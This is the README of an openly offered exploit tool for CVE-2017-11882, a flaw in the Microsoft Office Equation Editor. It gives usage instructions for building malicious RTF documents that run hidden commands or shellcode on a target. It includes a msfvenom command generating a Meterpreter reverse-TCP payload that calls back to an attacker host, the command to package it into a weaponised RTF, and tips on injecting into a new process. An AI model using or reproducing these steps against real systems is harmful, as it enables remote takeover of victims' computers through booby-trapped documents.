CVE-2017-11882 Exploit accepts over 17k bytes long command/code in maximum.
For remote command execution,this exploit will call WinExec with SW_HIDE and call ExitProcess after WinExec returns.
For remote code execution,this exploit just jmp to code.
I cannot find a reference for the object structure...so I cannot change the file length for arbitrary length code execution..:(
But I do think 17k bytes is really enough. Python script will detect the payload size you need and choose the correct payload template.
Caution: RCE will stuck winword process if you don't migrate to another process!
Currently this exploit will inject your shellcode to new EQNEDT32.EXE process if you specify -i flag. This operation is suspicious to AV but it won't stuck the word process.
usage: CVE-2017-11882.py [-h] -c CMD [-t {0,1}] [-i INJECT] -o OUTPUT
Exploit for CVE-2017-11882 @unamer(https://github.com/unamer/CVE-2017-11882)
optional arguments:
  -h, --help            show this help message and exit
  -c CMD, --cmd CMD     Command or shellcode file to run in target system
                        (Must be shorter than 17967 bytes!!)
  -t {0,1}, --type {0,1}
                        Type (0:shellcode 1:command, default=1)
  -i INJECT, --inject INJECT
                        Inject shellcode to new process
  -o OUTPUT, --output OUTPUT
                        Output exploit rtf
Example:
For remote command execution
CVE-2017-11882.py -c cmd.exe -o test.rtf
For remote code execution
- Generate some shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.115 LPORT=2333 -o ./sc.bin
- Generate exploit
CVE-2017-11882.py -c sc.bin -t 0 -i 1 -o test.rtf
- 
Set debugger value to your debugger path in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EQNEDT32.EXE 
- 
Build an exploit and run it. 
- 
Set break point at 0x41165f 
- 
This break point will be hit twice, at second time the payload will be executed after this function returned.